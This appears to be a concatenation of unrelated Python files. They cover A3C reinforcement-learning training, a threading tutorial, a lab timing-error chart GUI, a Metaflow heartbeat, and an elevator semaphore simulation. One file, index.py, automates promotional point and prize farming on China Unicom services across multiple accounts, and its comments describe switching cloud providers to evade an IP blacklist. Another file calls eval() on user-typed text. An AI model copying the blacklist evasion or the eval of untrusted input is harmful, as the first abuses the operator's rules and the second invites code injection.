help='maximum length of an episode (default: 10000)')
parser.add_argument(
'--env',
default='PongNoFrameskip-v4',
metavar='ENV',
help='environment to train on (default: Pong-v0)')
parser.add_argument(
'--env-config',
default='./rl/config.json',
metavar='EC',
help='environment to crop and resize info (default: config.json)')
parser.add_argument(
'--shared-optimizer',
default=True,
metavar='SO',
help='use an optimizer without shared statistics.')
parser.add_argument(
'--load', default=False, metavar='L', help='load a trained model')
parser.add_argument(
'--save-max',
default=True,
metavar='SM',
help='Save model on every test run high score matched or bested')
parser.add_argument(
'--optimizer',
default='Adam',
metavar='OPT',
help='shares optimizer choice of Adam or RMSprop')
parser.add_argument(
'--load-model-dir',
default='saved_models/',
metavar='LMD',
help='folder to load trained models from')
parser.add_argument(
'--save-model-dir',
default='saved_models/',
metavar='SMD',
help='folder to save trained models')
parser.add_argument(
'--log-dir', default='logs/', metavar='LG', help='folder to save logs')
parser.add_argument(
'--gpu-ids',
type=int,
default=-1,
nargs='+',
help='GPUs to use [-1 CPU only] (default: -1)')
parser.add_argument(
'--amsgrad',
default=True,
metavar='AM',
help='Adam optimizer amsgrad parameter')
parser.add_argument(
'--skip-rate',
type=int,
default=4,
metavar='SR',
help='frame skip rate (default: 4)')
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
# Implemented multiprocessing using locks but was not beneficial. Hogwild
# training was far superior
if __name__ == '__main__':
args = parser.parse_args()
torch.manual_seed(args.seed)
if args.gpu_ids == -1:
args.gpu_ids = [-1]
else:
torch.cuda.manual_seed(args.seed)
mp.set_start_method('spawn')
setup_json = read_config(args.env_config)
env_conf = setup_json["Default"]
for i in setup_json.keys():
if i in args.env:
env_conf = setup_json[i]
env = atari_env(args.env, env_conf, args)
shared_model = A3CSAM(env.observation_space.shape, env.action_space)
num_params = 0
for p in shared_model.parameters():
num_params += p.data.view(-1).size(0)
print(f"num param {num_params}")
if args.load:
saved_state = torch.load(
'{0}{1}.dat'.format(args.load_model_dir, args.env),
map_location=lambda storage, loc: storage)
shared_model.load_state_dict(saved_state)
shared_model.share_memory()
if args.shared_optimizer:
if args.optimizer == 'RMSprop':
optimizer = SharedRMSprop(shared_model.parameters(), lr=args.lr)
if args.optimizer == 'Adam':
optimizer = SharedAdam(
shared_model.parameters(), lr=args.lr, amsgrad=args.amsgrad)
optimizer.share_memory()
else:
optimizer = None
processes = []
p = mp.Process(target=test, args=(args, shared_model, env_conf))
p.start()
processes.append(p)
time.sleep(0.1)
for rank in range(0, args.workers):
p = mp.Process(
target=train, args=(rank, args, shared_model, optimizer, env_conf))
p.start()
processes.append(p)
time.sleep(0.1)
for p in processes:
time.sleep(0.1)
p.join()
|
python0811_threadLocal.py
|
# -*- coding: utf-8 -*-
global_dict = {}
def std_thread(name):
std = Student(name)
# 把std放到全局变量global_dict中:
global_dict[threading.current_thread()] = std
do_task_1()
do_task_2()
def do_task_1():
# 不传入std,而是根据当前线程查找:
std = global_dict[threading.current_thread()]
def do_task_2():
# 任何函数都可以查找出当前线程的std变量:
std = global_dict[threading.current_thread()]
print '-------ThreadLocal-------'
import threading
# 创建全局ThreadLocal对象:
local_school = threading.local()
def process_student():
print 'Hello, %s (in %s)' % (local_school.student1, threading.current_thread().name)
def process_thread(name):
# 绑定ThreadLocal的student:
local_school.student1 = name
process_student()
t1 = threading.Thread(target=process_thread, args=('Alice',), name='Thread-A')
t2 = threading.Thread(target=process_thread, args=('Bob',), name='Thread-B')
t1.start()
t2.start()
t1.join()
t2.join()
# local_school.student都是线程的局部变量,可以任意读写而互不干扰,也不用管理锁的问题,ThreadLocal内部会处理。
# ThreadLocal最常用的地方就是为每个线程绑定一个数据库连接,HTTP请求,用户身份信息等,这样一个线程的所有调用到的处理函数都可以非常方便地访问这些资源。
# 计算密集型 vs. IO密集型
# 用单进程 单线程 模型来执行多任务,这种全新的模型称为事件驱动模型。
# Nginx就是支持异步IO的Web服务器
# 协程 单进程的异步编程模型
print '-------分布式进程-------'
# https://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000/001386832973658c780d8bfa4c6406f83b2b3097aed5df6000
# 未学
|
index.py
|
# -*- coding: utf8 -*-
import time
from threading import Thread
from activity.unicom.dailySign import SigninApp
from activity.unicom.integralTask import IntegralTask
from activity.unicom.watchAddFlow import WatchAddFlow
from activity.unicom.superSimpleTask import SuperSimpleTask
from activity.unicom.unicomTurnCard import TurnCard
from activity.unicom.unicomTurnTable import TurnTable
from activity.unicom.unicomZhuaWaWa import ZhuaWaWa
from activity.unicom.sheggMachine import SheggMachine
from activity.unicom.blindBox import BlindBox
from activity.unicom.unicomSignerTask import SignerTask
from activity.unicom.zhuanjifenWeiBo import ZJFWeiBo
from activity.woread.luckdraw import LuckDraw
from activity.woread.openbook import OpenBook
from activity.woread.readluchdraw import ReadLuchDraw
from activity.woread.thanksgiving import ThanksGiving
from activity.woread.prizedetail import Prize
from activity.wolearn.zsmh import ZSMHAct
from activity.wolearn.xxdgg import XxdggAct
from activity.wolearn.wabao import WzsbzAct
from activity.wolearn.wmms2 import BxwmAct
from activity.wolearn.stdt5 import Stdthd
from activity.womail.dailyTask import DailySign
from activity.womail.scratchable import Scratchable
from activity.womail.puzzle2 import Puzzle2
from activity.push.pushlog import PushLog
def Template(cls):
# 联通手机号 服务密码 配置 (支持多账号)
ts = []
for mobile, password in [
# ('手机号', '服务密码'),
# ('手机号', '服务密码'),
]:
ts.append(Thread(target=cls(mobile, password).run))
for t in ts:
t.start()
for t in ts:
t.join()
def WXTemplate(cls):
# 微信沃邮箱 mobile openId配置 (支持多账号)
ts = []
for item in [
# {
# "mobile": "xxx",
# "openId": "xxx"
# },
# {
# "mobile": "xxx",
# "openId": "xxx"
# },
]:
ts.append(Thread(target=cls(**item).run))
for t in ts:
t.start()
for t in ts:
t.join()
def PushTemplate():
# 消息推送 (读取数据存储服务记录的日志进行推送)
# utils/config.py 推送配置
# 填写参与活动任务的账号
# 不需要推送 可以不填
PushLog([
# "联通手机号-1",
# "联通手机号-2",
# "沃邮箱mobile-1",
# "沃邮箱mobile-2",
]).run()
def main_handler(event=None, context=None):
"""
腾讯云函数每15分钟执行一次
"""
now_time = int(time.strftime(
'%H%M',
time.localtime(time.time() + 8 * 60 * 60 + time.timezone)
))
DEBUG = False
# 沃阅读活动
if now_time in range(600, 800) or DEBUG: # 7次
Template(LuckDraw)
Template(OpenBook)
if now_time in range(600, 730) or DEBUG: # 5次
Template(ThanksGiving)
if now_time in range(800, 830) or DEBUG: # 1次
Template(ReadLuchDraw)
if now_time in range(830, 900) or DEBUG: # 自动领取奖品
Template(Prize)
# 沃学习活动
if now_time in range(900, 1100) or DEBUG:
Template(ZSMHAct) # 7
Template(XxdggAct) # 8
Template(WzsbzAct) # 6
Template(BxwmAct) # 5
if now_time in range(900, 930) or DEBUG:
Template(Stdthd)
# 沃邮箱活动
if now_time in range(1000, 1010) or now_time in range(1300, 1310) or DEBUG:
WXTemplate(DailySign)
WXTemplate(Puzzle2)
WXTemplate(Scratchable)
# ----------------------------------------------------------------
# 使用华为云函数工作流 (腾讯云函数、阿里函数计算 获取积分ip黑名单)
# 联通每日签到
if now_time in range(800, 830) or now_time in range(1130, 1200) or now_time in range(1530, 1600) or DEBUG:
Template(SigninApp)
# 联通签到页看视频领流量
if now_time in range(800, 900) or DEBUG:
Template(WatchAddFlow)
# 赚积分外卖购物任务
if now_time in range(900, 930) or DEBUG:
Template(SignerTask)
Template(ZJFWeiBo)
# 联通签到页积分任务
if now_time in range(800, 1600) or DEBUG:
Template(SuperSimpleTask)
# 联通积分翻倍任务
if now_time in range(800, 1000) or DEBUG:
Template(IntegralTask)
# 联通签到页转盘抽卡任务
if now_time in range(900, 1100) or DEBUG:
Template(SheggMachine)
Template(BlindBox)
Template(TurnCard)
Template(TurnTable)
Template(ZhuaWaWa)
# 消息推送
if now_time in range(1130, 1140) or now_time in range(1530, 1540) or DEBUG:
PushTemplate()
|
TimingStability.py
|
"""
Analyzes Lauecollect logfiles and generates a chart of the
history of the timing error.
Author: Friedrich Schotte, NIH, 7 Jun 2010 - 4 Feb 2017
"""
from numpy import *
import wx
from logging import debug,info,warn,error
__version__ = "2.5" # separate timing logfile
class TimingStabilityChart (wx.Frame):
def __init__(self):
wx.Frame.__init__(self,parent=None)
self.title = "Laser to X-ray Timing"
# Menus
menuBar = wx.MenuBar()
menu = wx.Menu()
menu.Append (101,"Watch directory...\tCtrl+O",
"Select top level folder containig all log files to watch.")
self.Bind (wx.EVT_MENU,self.SelectToplevelDir,id=101)
menu.Append (112,"&Save As...","Creates text file with numerical data.")
self.Bind (wx.EVT_MENU,self.OnSave,id=112)
menu.Append (121,"E&xit","Closes this window.")
self.Bind (wx.EVT_MENU,self.OnExit,id=121)
menuBar.Append (menu,"&File")
self.Bind(wx.EVT_CLOSE,self.OnExit)
menu = wx.Menu()
menu.Append (402,"&Options...","Parameters")
self.Bind (wx.EVT_MENU,self.OnOptions,id=402)
menuBar.Append (menu,"&Options")
menu = wx.Menu()
menu.Append (501,"&About...","Version information")
self.Bind (wx.EVT_MENU,self.OnAbout,id=501)
menuBar.Append (menu,"&Help")
self.SetMenuBar (menuBar)
# Controls
from matplotlib.figure import Figure
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg
self.figure = Figure(figsize=(4,3))
self.canvas = FigureCanvasWxAgg(self,-1,self.figure)
self.figure.subplots_adjust(bottom=0.2)
self.plot = self.figure.add_subplot(1,1,1)
self.liveControl = wx.CheckBox(self,label="Live")
self.Bind(wx.EVT_CHECKBOX,self.OnLive,self.liveControl)
self.slider = wx.Slider(self)
self.Bind(wx.EVT_SLIDER,self.OnSlider)
self.CreateStatusBar()
# Layout
vbox = wx.BoxSizer(wx.VERTICAL)
vbox.Add(self.canvas,proportion=1,flag=wx.EXPAND)
hbox = wx.BoxSizer(wx.HORIZONTAL)
flag = wx.ALIGN_CENTRE_VERTICAL|wx.ALL
hbox.Add(self.liveControl,proportion=0,flag=flag,border=5)
hbox.Add(self.slider,proportion=1,flag=wx.EXPAND)
vbox.Add(hbox,proportion=0,flag=wx.EXPAND)
self.SetSizer(vbox)
self.Fit()
# Default settings.
global toplevel_dir
toplevel_dir = "//mx340hs/data/anfinrud_1702/Data/WAXS"
self.export_filename = "//mx340hs/data/anfinrud_1702/Logfiles/Timing Stability.txt"
self.timepoints = []
self.max_dt = +400e-12
self.min_dt = -400e-12
self.Size = 640,480
self.update_interval = 10 # seconds
# Initialization
# Restore last saved settings.
self.config_dir = wx.StandardPaths.Get().GetUserDataDir()+\
"/TimingStability"
self.config = wx.FileConfig(localFilename=self.config_dir+"/settings.py")
self.settings = "timepoints","max_dt","min_dt","Size","export_filename",\
"live","update_interval"
for name in self.settings:
try: setattr(self,name,eval(self.config.Read(name)))
except: pass
try: toplevel_dir = eval(self.config.Read('toplevel_dir'))
except: pass
try: self.slider.Value = eval(self.config.Read('fraction'))
except: pass
# Restore window position.
try:
x,y = eval(self.config.Read('Position'))
if x >= 0 and y >= 0: self.Position = x,y
except: pass
self.Show()
# Initialization
self.npoints = 0
from threading import Thread
self.update_task = Thread(target=read_logfiles,name="read_logfiles")
self.update()
def update(self,event=None):
# Do some work.
from time import time
# Relaunch background update task after it is done, afte rwating a specified
# time, given by 'update_interval'.
if self.live and not self.update_task.isAlive() and \
time()-update_completed > self.update_interval:
from threading import Thread
global cancelled; cancelled = False
self.update_task = Thread(target=read_logfiles,name="read_logfiles")
self.update_task.start()
self.refresh()
# Relaunch yourself.
self.timer = wx.Timer(self)
self.Bind (wx.EVT_TIMER,self.update)
self.timer.Start(1000,oneShot=True)
def refresh(self,event=None):
"Generate the plot"
# Update window title.
self.SetTitle(self.title+" - "+toplevel_dir)
# Update the chart.
if len(data.t) != self.npoints: self.refresh_chart()
self.npoints = len(data.t)
# Update status bar.
text = str(self.GetStatusBar().GetStatusText()).replace('\x00','')
if text == "" or "..." in text: self.SetStatusText(status)
def refresh_chart(self):
# Generate a chart.
from pylab import setp,date2num,DateFormatter
from datetime import datetime
t,act_delay,nom_delay = data.t,data.act_delay,data.nom_delay
global date,dt # for debugging
date = array([date2num(datetime.fromtimestamp(x)) for x in t])
dt = act_delay - nom_delay
# Filter the data to be plotted.
# Timepoints > 1us cannot be measured reliably.
##dt[abs(nom_delay) > 1e-6] = nan
# If specified, show only the timing error for selected time points.
if len(self.timepoints) > 0:
for timepoint in self.timepoints:
dt[abs(nom_delay-timepoint) > 10e-12] = nan
self.figure.subplots_adjust(bottom=0.2)
self.plot = self.figure.add_subplot(1,1,1)
self.plot.clear()
self.plot.set_xlabel("time")
self.plot.xaxis_date()
formatter = DateFormatter('%b %d %H:%M')
self.plot.xaxis.set_major_formatter(formatter)
setp(self.plot.get_xticklabels(),rotation=90,fontsize=10)
self.plot.set_ylabel("timing error [ps]")
self.plot.grid()
if not all(isnan(dt)):
order = argsort(date)
self.plot.plot(date[order],dt[order]/1e-12,'.')
# Restrict the time range plotted according to the slider.
tmin,tmax = amin(date[~isnan(dt)]),amax(date[~isnan(dt)])
fraction = 1-self.slider.GetValue()/100.
tmin = tmax - fraction*(tmax-tmin)
self.plot.set_xlim(tmin,tmax)
if not isnan(self.min_dt): self.plot.set_ylim(ymin=self.min_dt/1e-12)
if not isnan(self.max_dt): self.plot.set_ylim(ymax=self.max_dt/1e-12)
self.canvas.draw()
def get_data(self):
"""Date and time error as tuple of two numpy arrays.
Returns (t,dt)
t: number of seconds since 1 Jan 1970 00:00:00 UTC as floating point
value.
dt: Laser to X-ray timing error in seconds
"""
from pylab import date2num
from datetime import datetime
t,act_delay,nom_delay = data.t,data.act_delay,data.nom_delay
dt = act_delay - nom_delay
# Filter the data to be plotted.
selected = ~isnan(dt)
# Timepoints > 1us cannot be measured reliably.
selected &= (abs(nom_delay) <= 1e-6)
# If specified, show only the timing error for selected time points.
if len(self.timepoints) > 0:
for timepoint in self.timepoints:
selected &= (abs(nom_delay-timepoint) <= 10e-12)
t = t[selected]; dt = dt[selected]
if not all(isnan(dt)):
order = argsort(t)
t = t[order]
dt = dt[order]
# Restrict the time range plotted according to the slider.
tmin,tmax = amin(t[~isnan(dt)]),amax(t[~isnan(dt)])
fraction = 1-self.slider.GetValue()/100.
tmin = tmax - fraction*(tmax-tmin)
selected = [(tmin <= t) & (t <= tmax)]
t = t[selected]
dt = dt[selected]
return t,dt
data = property(get_data)
def SelectToplevelDir(self,event):
"""Called from menu File/Watch Directory...
Let the user pick the directory which contains all the log files to watch.
"""
global toplevel_dir
dlg = wx.DirDialog(self, "Where to look for Lauecollect log files:",
style=wx.DD_DEFAULT_STYLE)
dlg.SetPath(toplevel_dir)
# ShowModal pops up a dialog box and returns control only after the user
# has selects OK or Cancel.
OK = (dlg.ShowModal() == wx.ID_OK)
dlg.Destroy()
if not OK: return
toplevel_dir = str(dlg.GetPath())
self.SaveSettings()
reset()
global update_completed; update_completed = 0
def OnSave(self,event):
"Called from menu File/Save As..."
from os.path import dirname,basename
from inspect import getfile
filename = self.export_filename
dlg = wx.FileDialog(self,"Save Displayed Data Points As",
style=wx.SAVE|wx.OVERWRITE_PROMPT,
defaultFile=basename(filename),defaultDir=dirname(filename),
wildcard="Text Files (*.txt)|*.txt|All Files (*.*)|*.*")
if dlg.ShowModal() == wx.ID_OK:
filename = dlg.GetPath()
header = "X-ray to laser timing error recorded by Lauecollect\n"
modulename = getfile(lambda x: None)
header += "Generated by "+basename(modulename)+" "+__version__+"\n"
header += "Filtered, including only these timepoints: "
for t in self.timepoints: header += time_string(t)+", "
header = header.rstrip(", ")
if len(self.timepoints) == 0: header += "all <= 1 us"
labels="date time,dt[s]"
t,dt = self.data
date_time = map(datestring,t)
from textfile import save
save ([date_time,dt],filename,header,labels)
self.export_filename = filename
dlg.Destroy()
def OnExit(self,event):
"Called on File/Exit or when the windows's close button is clicked"
self.SaveSettings()
self.Destroy()
def OnOptions(self,event):
"Change parameters controlling the centering procedure."
dlg = Options(self)
dlg.CenterOnParent()
dlg.Show()
def OnAbout(self,event):
"Called from the Help/About"
from os.path import basename
from inspect import getfile
filename = getfile(lambda x: None)
info = basename(filename)+" "+__version__+"\n"+__doc__
dlg = wx.MessageDialog(self,info,"About",wx.OK|wx.ICON_INFORMATION)
dlg.CenterOnParent()
dlg.ShowModal()
dlg.Destroy()
def OnSlider(self,event):
self.refresh_chart()
def OnLive(self,event):
"called when 'Active' buttoin is toggled"
global cancelled,update_completed
cancelled = not self.liveControl.Value
if self.liveControl.Value == True: update_completed = 0
def get_live(self):
"Is 'Live' checkbox checked?"
return self.liveControl.Value
def set_live(self,value): self.liveControl.Value = value
live = property(get_live,set_live)
def SaveSettings(self):
# Save settings for next time.
from os.path import exists
from os import makedirs
if not exists(self.config_dir): makedirs(self.config_dir)
for name in self.settings:
self.config.Write (name,repr(getattr(self,name)))
self.config.Write ("toplevel_dir",repr(toplevel_dir))
self.config.Write ("fraction",repr(self.slider.Value))
self.config.Write ("Position",repr(self.Position))
self.config.Flush()
class Options (wx.Dialog):
"Allows the use to configure camera properties"
def __init__ (self,parent):
wx.Dialog.__init__(self,parent,-1,"Beam Centering Options")
# Controls
style = wx.TE_PROCESS_ENTER
self.Timepoints = wx.TextCtrl (self,size=(80,-1),style=style)
self.Max = wx.TextCtrl (self,size=(80,-1),style=style)
self.Min = wx.TextCtrl (self,size=(80,-1),style=style)
self.UpdateInterval = wx.TextCtrl (self,size=(80,-1),style=style)
self.Bind (wx.EVT_TEXT_ENTER,self.OnEnter)
# Layout
layout = wx.BoxSizer()
grid = wx.FlexGridSizer (cols=2,hgap=5,vgap=5)
flag = wx.ALIGN_CENTER_VERTICAL
label = "Filter chart, including only these timepoints:"
grid.Add (wx.StaticText(self,label=label),flag=flag)
grid.Add (self.Timepoints,flag=flag)
label = "Vertical scale upper limit:"
grid.Add (wx.StaticText(self,label=label),flag=flag)
grid.Add (self.Max,flag=flag)
label = "Vertical scale lower limit:"
grid.Add (wx.StaticText(self,label=label),flag=flag)
grid.Add (self.Min,flag=flag)
label = "Update Interval:"
grid.Add (wx.StaticText(self,label=label),flag=flag)
grid.Add (self.UpdateInterval,flag=flag)
# Leave a 10-pixel wide space around the panel.
layout.Add (grid,flag=wx.EXPAND|wx.ALL,border=10)
self.SetSizer(layout)
self.Fit()
self.update()
def update(self):
parent = self.Parent
timepoints = ""
for t in parent.timepoints: timepoints += time_string(t)+","
timepoints = timepoints.strip(",")
self.Timepoints.Value = timepoints
self.Min.Value = time_string(self.Parent.min_dt).replace("off","auto")
self.Max.Value = time_string(self.Parent.max_dt).replace("off","auto")
self.UpdateInterval.Value = time_string(self.Parent.update_interval)
def OnEnter(self,event):
text = self.Timepoints.Value
self.Parent.timepoints = \
[seconds(t) for t in text.split(",") if not isnan(seconds(t))]
self.Parent.min_dt = seconds(self.Min.Value)
self.Parent.max_dt = seconds(self.Max.Value)
self.Parent.update_interval = seconds(self.UpdateInterval.Value)
self.update()
self.Parent.refresh_chart()
toplevel_dir = "//mx340hs/data/anfinrud_1702/Data/WAXS"
class data:
t = zeros(0)
nom_delay = zeros(0)
act_delay = zeros(0)
status = ""
cancelled = False
update_completed = 0
logfiles = {}
timestamps = {}
def read_logfiles():
from table import table
from os.path import basename,getmtime
from time import time
global status,update_completed
status = "Searching for logfiles..."
filenames = logfilenames(toplevel_dir)
for filename in filenames:
if cancelled: break
# Read a file only if it has not been read before or if it was
# modified after it was read.
if filename in timestamps and timestamps[filename] == getmtime(filename):
continue
timestamps[filename] = getmtime(filename)
status = "Reading %s..." % basename(filename)
try:
logfiles[filename] = table(filename,separator="\t")
update_data()
except Exception,msg: warn("Skipping %s: %s" % (filename,msg)); continue
status = ""
update_completed = time()
def reset():
global logfiles,timestamps
logfiles = {}
timestamps = {}
data.t = data.act_delay = data.nom_delay = zeros(0)
def update_data():
from time_string import timestamp
status = "Merging..."
t = nom_delay = act_delay = zeros(0)
for logfile in logfiles.values():
t = concatenate((t,[timestamp(d,"") for d in logfile.date_time]))
nom_delay = concatenate((nom_delay,map(filename_delay,logfile["filename"])))
act_delay = concatenate((act_delay,logfile.act_delay))
data.t,data.act_delay,data.nom_delay = t,act_delay,nom_delay
def filename_delay(filename):
"""Decode image filename and extract delay
e.g. "AlCl3-2_1_90C_-10us-3.mccd" -> -10e-6"""
from time_string import seconds
delay = filename.replace(".mccd","")
delay = delay.split("_")[-1]
if delay.startswith("-"): delay = delay[1:]; sign = "-"
else: sign = "-"
delay = delay.split("-")[0]
delay = sign+delay
delay = seconds(delay)
return delay
def logfilenames(toplevel_dir):
"""List of the pathnames of all Lauecollect logfiles in 'toplevel_dir'
and subdirectories."""
from os import walk
logfiles = []
for (dirpath,dirnames,filenames) in walk(toplevel_dir):
if cancelled: return logfiles
for filename in filenames:
filename = dirpath+"/"+filename
if not filename.endswith("_timing.txt"): continue
logfiles += [filename]
return logfiles
def timestamp(date_time):
"Convert a date string to number of seconds til 1 Jan 1970."
from time import strptime,mktime
return mktime(strptime(date_time,"%d-%b-%y %H:%M:%S"))
def datestring(seconds):
"""Format time in seconds since 1 Jan 1970 00:00 UST as local time string
in the format '1-Jan-70 00:00:00'"""
from datetime import datetime
from time import strftime,localtime
return strftime("%d-%b-%y %H:%M:%S",localtime(seconds))
def time_string(t):
"""Convert time given in seconds in more readable format
such as ps, ns, ms, s, min, hours and days."""
if t == "off": return "off"
try: t = float(t)
except: return "off"
if t != t: return "off" # not a number
if t == 0: return "0"
if abs(t) < 0.5e-12: return "0"
if abs(t) < 999e-12: return "%.3gps" % (t*1e12)
if abs(t) < 999e-9: return "%.3gns" % (t*1e9)
if abs(t) < 999e-6: return "%.3gus" % (t*1e6)
if abs(t) < 999e-3: return "%.3gms" % (t*1e3)
if abs(t) <= 59: return "%.3gs" % t
if abs(t) <= 3600-1: return "%02d:%02dmin" % (t/60,round(t%60))
if abs(t) <= 24*3600-1: return "%d:%02dh" % (round(t/3600),round(t%3600/60))
return str(int(t/(24*3600)))+"d "+str(int(round(t%(24*3600)/3600)))+"h"
def seconds (text):
""" convert a text string like "10ns" into a floating point value in seconds.
Units accepted are "s","ms", "us", "ns", "ps" "min", "hour" ("h") """
from numpy import nan
text = text.replace("hours","*3600")
text = text.replace("hour","*3600")
text = text.replace("h","*3600")
text = text.replace("min","*60")
text = text.replace("s","")
text = text.replace("m","*1e-3")
text = text.replace("u","*1e-6")
text = text.replace("n","*1e-9")
text = text.replace("p","*1e-12")
try: return float(eval(text))
except: return nan
def repr(x):
"""Replacement for built-in function 'repr'.
Fixes Microsoft quirk nan -> '1.#QNAN' or '1.#IND'. inf -> '1.#INF'"""
if issubclass(type(x),float):
if isnan(x): return "nan"
if isinf(x) and x>0: return "inf"
if isinf(x) and x<0: return "-inf"
return __builtins__.repr(x)
def main():
global win
if not hasattr(wx,"app"): wx.app = wx.App(redirect=False)
win = TimingStabilityChart()
wx.app.MainLoop()
if __name__ == "__main__":
"""Main program"""
main()
##from thread import start_new_thread
##start_new_thread (main,()) # use for debugging
|
heartbeat.py
|
import time
import requests
import json
from threading import Thread
from metaflow.sidecar_messages import MessageTypes, Message
from metaflow.metaflow_config import METADATA_SERVICE_HEADERS
from metaflow.exception import MetaflowException
HB_URL_KEY = 'hb_url'
class HeartBeatException(MetaflowException):
headline = 'Metaflow heart beat error'
def __init__(self, msg):
super(HeartBeatException, self).__init__(msg)
class MetadataHeartBeat(object):
def __init__(self):
self.headers = METADATA_SERVICE_HEADERS
self.req_thread = Thread(target=self.ping)
self.req_thread.daemon = True
self.default_frequency_secs = 10
self.hb_url = None
def process_message(self, msg):
# type: (Message) -> None
if msg.msg_type == MessageTypes.SHUTDOWN:
# todo shutdown doesnt do anything yet? should it still be called
self.shutdown()
if (not self.req_thread.is_alive()) and \
msg.msg_type == MessageTypes.LOG_EVENT:
# set post url
self.hb_url = msg.payload[HB_URL_KEY]
# start thread
self.req_thread.start()
def ping(self):
retry_counter = 0
while True:
try:
frequency_secs = self.heartbeat()
if frequency_secs is None or frequency_secs <= 0:
frequency_secs = self.default_frequency_secs
time.sleep(frequency_secs)
retry_counter = 0
except HeartBeatException as e:
retry_counter = retry_counter + 1
time.sleep(4**retry_counter)
def heartbeat(self):
if self.hb_url is not None:
response = \
requests.post(url=self.hb_url, data='{}', headers=self.headers)
# Unfortunately, response.json() returns a string that we need
# to cast to json; however when the request encounters an error
# the return type is a json blob :/
if response.status_code == 200:
return json.loads(response.json()).get('wait_time_in_seconds')
else:
raise HeartBeatException('HeartBeat request (%s) failed'
' (code %s): %s' %
(self.hb_url, response.status_code,
response.text))
return None
def shutdown(self):
# attempts sending one last heartbeat
self.heartbeat()
|
elevador.py
|
#!/usr/bin/python3
from threading import Semaphore, Thread
from time import sleep
from random import random, choice
from termcolor import cprint, colored
freq_elev = 1 # Frecuencia (en segundos) de avance del elevador)
freq_alum = 0.1 # Frecuencia (en segundos) de llegada de un nuevo alumno
demora_puerta = 0.01 # ¡Mi solución es mala! Tuve que agregar
# una demora a la puerta para obligar a que
# se "pase el turno"
#
carga_max = 5 # ¿Cuántos alumnos caben en el elevador?
multiplex = Semaphore(carga_max) # Asegura que no entren más de los que caben
pisos = [0,1,2,3,4] # Lista de pisos definidos
mut_colas = Semaphore(1) # Un semáforo por cola para que el elevador despierte a los hilos
# conforme va pasando por los pisos
colas = {} # Listas de alumnos formados en cada uno de los pisos
puerta = Semaphore(1) # Uso exclusivo de la "puerta" (para controlar cuántos hay dentro)
a_bordo = {} # Lista de hilos que están a bordo, separados por piso destino
# Las colas de espera por el elevador y de espera para bajar del
# elevador: Una cola por cada piso. Para subir al elevador, cada cola
# tiene un semáforo relacionado.
for i in pisos:
colas[i] = {'num': 0, 'sem': Semaphore(0)}
a_bordo[i] = []
def elevador():
'''El elevador es el único hilo que se mantiene vivo durante toda la
vida del sistema. Sube y baja por los pisos esperando encontrar
alumnos (¡qué poca eficiencia energética!), y va despertando a los
alumnos que hagan falta
'''
piso_actual = 0
direccion = True # True = ↑, False = ↓
while True:
# Primero: Avanza al piso que le toca
piso_prev = piso_actual
sleep(freq_elev)
# Registra los topes: Cambia de dirección al llegar al final
# del recorrido
if (direccion and piso_actual >= pisos[-1]) or (not direccion and piso_actual <= pisos[0]):
direccion = not direccion
# Avanza en la dirección correspondiente
if direccion:
piso_actual += 1
else:
piso_actual -= 1
cprint('E: %d ⇒ %d' % (piso_prev, piso_actual), 'yellow')
# Muestro el estado global del sistema sólo cuando piso==0 (para no saturar)
if piso_actual == 0:
estado_global()
# Antes de entrar, deje salir: ¿Alquien tiene que bajar?
puerta.acquire()
while len(a_bordo[piso_actual]) > 0:
# Sacamos al alumno de la cola destino, y lo despertamos gentilmente
alum = a_bordo[piso_actual].pop()
alum.release()
# Si hay alumnos formado en la cola, despierta a los que pueda
mut_colas.acquire()
cprint(' %d alumnos formados, %d a bordo' % (colas[piso_actual]['num'], carga_total()), 'yellow')
while carga_total() < carga_max and colas[piso_actual]['num'] > 0:
colas[piso_actual]['sem'].release()
colas[piso_actual]['num'] -= 1
sleep(demora_puerta)
if carga_total() > carga_max:
cprint('Algo anda mal, muy mal. Carga total == %d' % carga_total(), 'yellow', 'on_red')
sleep(1)
puerta.release()
mut_colas.release()
def alumno(num):
'''Representa a cada uno de los alumnos. Elige un piso origen y
destino al azar, se forma en la cola que le toca y se
duerme. Cuando lo despiertan, sube al elevador, y se vuelve a
dormir. Y cuando vuelve a despertar, ¡señal que ya llegó!
'''
desde = choice(pisos)
hacia = choice(pisos)
cprint('A%d: %d ⇒ %d' % (num, desde, hacia), 'green')
if desde == hacia:
cprint('A%d: Estoy donde quiero estar :-P' % (num), 'green')
return True # Nada que hacer!
# Se "apunta" en la cola que le corresponde y espera al elevador
mut_colas.acquire()
cprint(' A%d: A la cola %d (somos %d)' % (num, desde, colas[desde]['num']), 'green')
colas[desde]['num'] += 1
mut_colas.release()
colas[desde]['sem'].acquire()
# El elevador está aquí. Sube.
cprint(' A%d. Tomo elevador %d → %d' % (num, desde, hacia), 'green')
subir_elevador(num, hacia)
# Llegamos a nuestro destino. Baja.
cprint(' A%d. ¡Gracias elevador! 😉' % num, 'green')
multiplex.release()
def subir_elevador(num, dest):
'''Para subirse al elevador, un alumno agrega a la cola
correspondiente un semáforo, y se duerme esperando a su llegada.
'''
multiplex.acquire()
mi_dest = Semaphore(0)
cprint('¡Pásele %d!' % (num), 'cyan')
puerta.acquire()
a_bordo[dest].append(mi_dest)
puerta.release()
mi_dest.acquire()
def carga_total():
'''Reporta la carga total que tiene el elevador en un momento dado.
Para dar resultados consistentes, se asume que el invocador tiene
al mutex puerta.
'''
tot = 0
for i in pisos:
tot += len(a_bordo[i])
return tot
def espera_total():
'''Reporta el total de alumnos en espera por el elevador.
Para dar resultados consistentes, se asume que el invocador tiene
al mutex puerta.
'''
tot = 0
for i in pisos:
tot += colas[i]['num']
return tot
def estado_global():
'''
Reporta el estado global del sistema: Cuántos alumnos están formados en cada cola
'''
puerta.acquire()
carga = carga_total()
espera = espera_total()
cprint('===== Estado global del sistema: =====', 'white', 'on_blue')
cprint('%d esperando por el elevador:' % (espera), 'green', 'on_blue')
cprint("\t".join(' %d: %d' % (i, colas[i]['num']) for i in pisos), 'green', 'on_blue')
cprint('A bordo (quedan %d lugares):' % (carga_max - carga), 'yellow', 'on_blue')
cprint("\t".join(' %d: %d' % (i, len(a_bordo[i])) for i in pisos), 'yellow', 'on_blue')
puerta.release()
Thread(target=elevador).start()
num = 0
while True:
num += 1
Thread(target=alumno, args=[num]).start()
sleep(freq_alum)
|
caching.py
|
"""
CherryPy implements a simple caching system as a pluggable Tool. This tool
tries to be an (in-process) HTTP/1.1-compliant cache. It's not quite there
yet, but it's probably good enough for most sites.
